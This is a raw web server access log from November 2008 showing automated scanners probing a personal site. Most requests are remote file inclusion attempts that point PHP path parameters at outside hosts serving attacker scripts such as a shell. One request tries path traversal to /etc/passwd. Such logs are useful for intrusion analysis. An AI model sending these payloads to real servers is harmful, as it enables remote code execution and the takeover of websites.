222.233.52.18 - - [21/Nov/2008:04:11:03 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "blue-dogz.com"
222.233.52.18 - - [21/Nov/2008:04:11:04 -0800] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "blue-dogz.com"
222.233.52.18 - - [21/Nov/2008:04:11:04 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "blue-dogz.com"
222.233.52.18 - - [21/Nov/2008:04:15:12 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "blue-dogz.com"
222.233.52.18 - - [21/Nov/2008:04:15:12 -0800] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "blue-dogz.com"
222.233.52.18 - - [21/Nov/2008:04:15:13 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "blue-dogz.com"
87.106.245.44 - - [21/Nov/2008:04:18:42 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
87.106.245.44 - - [21/Nov/2008:04:18:42 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
87.106.245.44 - - [21/Nov/2008:04:18:42 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
94.23.10.29 - - [21/Nov/2008:04:29:18 -0800] "GET /logs/access.log//?custompluginfile[]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "blue-dogz.com"
94.23.10.29 - - [21/Nov/2008:04:29:21 -0800] "GET /?custompluginfile[]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 200 6718 "-" "Mozilla/5.0" "blue-dogz.com"
94.23.10.29 - - [21/Nov/2008:04:29:21 -0800] "GET /logs//?custompluginfile[]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 200 943 "-" "Mozilla/5.0" "blue-dogz.com"
94.23.10.29 - - [21/Nov/2008:04:34:48 -0800] "GET /logs/access.log%20%20//?custompluginfile[]=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "blue-dogz.com"
88.116.96.124 - - [21/Nov/2008:04:42:34 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
88.116.96.124 - - [21/Nov/2008:04:42:34 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
88.116.96.124 - - [21/Nov/2008:04:42:35 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
66.249.71.203 - - [21/Nov/2008:04:43:37 -0800] "GET /wyatt/slides/HPIM0523.html HTTP/1.1" 200 12451 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:29 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:29 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:29 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:32 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:32 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:33 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:51 -0800] "GET /logs/access.log//?mosConfig_live_site=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:53 -0800] "GET /logs/access.log//?mosConfig_live_site=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:54 -0800] "GET /?mosConfig_live_site=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 6718 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:54 -0800] "GET /?mosConfig_live_site=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 6718 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:54 -0800] "GET /logs//?mosConfig_live_site=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 943 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:04:48:54 -0800] "GET /logs//?mosConfig_live_site=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 943 "-" "libwww-perl/5.814" "blue-dogz.com"
72.30.78.253 - - [21/Nov/2008:04:54:01 -0800] "GET /robots.txt HTTP/1.0" 200 40 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.blue-dogz.com"
94.23.10.29 - - [21/Nov/2008:04:57:38 -0800] "GET /logs/access.log//rpm9//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "blue-dogz.com"
94.23.10.29 - - [21/Nov/2008:04:57:38 -0800] "GET /rpm9//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "blue-dogz.com"
94.23.10.29 - - [21/Nov/2008:04:57:38 -0800] "GET /logs//rpm9//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "blue-dogz.com"
94.23.10.29 - - [21/Nov/2008:05:00:55 -0800] "GET /logs/access.log%20%20//rpm9//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rostrum56.ingeraldton.com/mutcp/tcp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:05:02:21 -0800] "GET /logs/scripts.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:05:02:22 -0800] "GET /logs/scripts.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:05:04:44 -0800] "GET /logs/scripts.log//?mosConfig_live_site=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:05:04:44 -0800] "GET /logs/scripts.log//?mosConfig_live_site=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
121.170.11.100 - - [21/Nov/2008:05:07:21 -0800] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
121.170.11.100 - - [21/Nov/2008:05:07:22 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
121.170.11.100 - - [21/Nov/2008:05:07:22 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
72.14.199.117 - - [21/Nov/2008:05:07:57 -0800] "GET /atom.xml HTTP/1.1" 404 275 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=10272581456949589261)" "blue-dogz.com"
212.176.205.147 - - [21/Nov/2008:05:10:00 -0800] "GET /administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
212.176.205.147 - - [21/Nov/2008:05:12:59 -0800] "GET /logs/access.log//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
212.176.205.147 - - [21/Nov/2008:05:13:00 -0800] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
87.106.187.166 - - [21/Nov/2008:05:20:49 -0800] "GET /logs/access.log/skin/zero_vote/ask_password.php?dir=http://comtechservices.net/phpforms/der.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
87.106.187.166 - - [21/Nov/2008:05:20:49 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://comtechservices.net/phpforms/der.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
87.106.187.166 - - [21/Nov/2008:05:20:49 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://comtechservices.net/phpforms/der.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
216.117.144.149 - - [21/Nov/2008:05:22:30 -0800] "GET /logs/access.log/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "blue-dogz.com"
216.117.144.149 - - [21/Nov/2008:05:22:30 -0800] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "blue-dogz.com"
216.117.144.149 - - [21/Nov/2008:05:22:42 -0800] "GET /logs/access.log/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "blue-dogz.com"
216.117.144.149 - - [21/Nov/2008:05:22:42 -0800] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "blue-dogz.com"
216.117.144.149 - - [21/Nov/2008:05:22:45 -0800] "GET /logs/access.log/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "blue-dogz.com"
216.117.144.149 - - [21/Nov/2008:05:22:46 -0800] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "blue-dogz.com"
216.117.144.149 - - [21/Nov/2008:05:22:58 -0800] "GET /logs/access.log/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "blue-dogz.com"
216.117.144.149 - - [21/Nov/2008:05:22:58 -0800] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "blue-dogz.com"
121.126.12.7 - - [21/Nov/2008:05:23:43 -0800] "GET /logs/access.log/skin/zero_vote/ask_password.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
121.126.12.7 - - [21/Nov/2008:05:23:43 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
121.126.12.7 - - [21/Nov/2008:05:23:43 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
121.170.11.100 - - [21/Nov/2008:05:23:49 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
121.170.11.100 - - [21/Nov/2008:05:23:49 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
87.106.187.166 - - [21/Nov/2008:05:24:00 -0800] "GET /logs/access.log%20/skin/zero_vote/ask_password.php?dir=http://comtechservices.net/phpforms/der.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
89.218.85.18 - - [21/Nov/2008:05:24:53 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://player.schulradio-bayern.de/phpmyadmin/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "blue-dogz.com"
89.218.85.18 - - [21/Nov/2008:05:24:53 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://player.schulradio-bayern.de/phpmyadmin/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "blue-dogz.com"
89.218.85.18 - - [21/Nov/2008:05:24:53 -0800] "GET /logs/access.log/skin/zero_vote/ask_password.php?dir=http://player.schulradio-bayern.de/phpmyadmin/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "blue-dogz.com"
207.57.2.157 - - [21/Nov/2008:05:26:17 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://geocities.com/kissunix/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "blue-dogz.com"
207.57.2.157 - - [21/Nov/2008:05:26:17 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://geocities.com/kissunix/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "blue-dogz.com"
207.57.2.157 - - [21/Nov/2008:05:26:17 -0800] "GET /include/lib.inc.php?site_path=http://geocities.com/kissunix/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "blue-dogz.com"
207.57.2.157 - - [21/Nov/2008:05:26:17 -0800] "GET /include/lib.inc.php?site_path=http://geocities.com/kissunix/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "blue-dogz.com"
207.57.2.157 - - [21/Nov/2008:05:26:17 -0800] "GET /logs//include/lib.inc.php?site_path=http://geocities.com/kissunix/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "blue-dogz.com"
207.57.2.157 - - [21/Nov/2008:05:26:17 -0800] "GET /logs//include/lib.inc.php?site_path=http://geocities.com/kissunix/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "blue-dogz.com"
212.26.227.88 - - [21/Nov/2008:05:43:25 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
212.26.227.88 - - [21/Nov/2008:05:43:31 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
212.26.227.88 - - [21/Nov/2008:05:47:08 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
212.26.227.88 - - [21/Nov/2008:05:47:08 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
212.26.227.88 - - [21/Nov/2008:05:47:09 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
212.26.227.88 - - [21/Nov/2008:05:47:23 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
212.26.227.88 - - [21/Nov/2008:05:47:24 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
212.26.227.88 - - [21/Nov/2008:05:47:24 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
190.56.164.90 - - [21/Nov/2008:05:49:33 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://hakier.com/oio/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
190.56.164.90 - - [21/Nov/2008:05:49:33 -0800] "GET /appserv/main.php?appserv_root=http://hakier.com/oio/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
190.56.164.90 - - [21/Nov/2008:05:49:33 -0800] "GET /logs/appserv/main.php?appserv_root=http://hakier.com/oio/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
121.126.12.7 - - [21/Nov/2008:05:50:06 -0800] "GET /logs/access.log/skin/zero_vote/ask_password.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
121.126.12.7 - - [21/Nov/2008:05:50:07 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
121.126.12.7 - - [21/Nov/2008:05:50:07 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
190.56.164.90 - - [21/Nov/2008:05:56:39 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://hakier.com/oio/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
190.56.164.90 - - [21/Nov/2008:05:56:40 -0800] "GET /appserv/main.php?appserv_root=http://hakier.com/oio/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
190.56.164.90 - - [21/Nov/2008:05:56:40 -0800] "GET /logs/appserv/main.php?appserv_root=http://hakier.com/oio/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
121.126.12.7 - - [21/Nov/2008:06:04:27 -0800] "GET /logs/access.log%20/skin/zero_vote/ask_password.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
84.19.184.14 - - [21/Nov/2008:06:07:22 -0800] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
69.73.133.74 - - [21/Nov/2008:06:15:45 -0800] "GET /modules/admin/vw_usr_roles.php?baseDir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "blue-dogz.com"
69.73.133.74 - - [21/Nov/2008:06:15:45 -0800] "GET /logs/access.log/modules/admin/vw_usr_roles.php?baseDir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "blue-dogz.com"
69.73.133.74 - - [21/Nov/2008:06:15:45 -0800] "GET /logs/modules/admin/vw_usr_roles.php?baseDir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "blue-dogz.com"
98.129.21.210 - - [21/Nov/2008:06:16:51 -0800] "GET /include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
98.129.21.210 - - [21/Nov/2008:06:16:51 -0800] "GET /include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
98.129.21.210 - - [21/Nov/2008:06:16:51 -0800] "GET /include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
87.66.0.221 - - [21/Nov/2008:06:17:47 -0800] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "blue-dogz.com"
70.38.12.204 - - [21/Nov/2008:06:19:58 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "blue-dogz.com"
70.38.12.204 - - [21/Nov/2008:06:19:58 -0800] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "blue-dogz.com"
70.38.12.204 - - [21/Nov/2008:06:19:58 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "blue-dogz.com"
83.2.108.2 - - [21/Nov/2008:06:20:19 -0800] "GET /dotproject//includes/db_connect.php?baseDir=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "blue-dogz.com"
83.2.108.2 - - [21/Nov/2008:06:20:24 -0800] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "blue-dogz.com"
89.108.89.141 - - [21/Nov/2008:06:21:09 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
89.108.89.141 - - [21/Nov/2008:06:21:35 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
89.108.89.141 - - [21/Nov/2008:06:21:35 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
89.108.89.141 - - [21/Nov/2008:06:21:35 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:06:22:17 -0800] "GET /dotproject//includes/db_connect.php?baseDir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:06:22:27 -0800] "GET /logs//dotproject//includes/db_connect.php?baseDir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "blue-dogz.com"
87.66.0.221 - - [21/Nov/2008:06:22:27 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "blue-dogz.com"
98.129.21.210 - - [21/Nov/2008:06:24:17 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
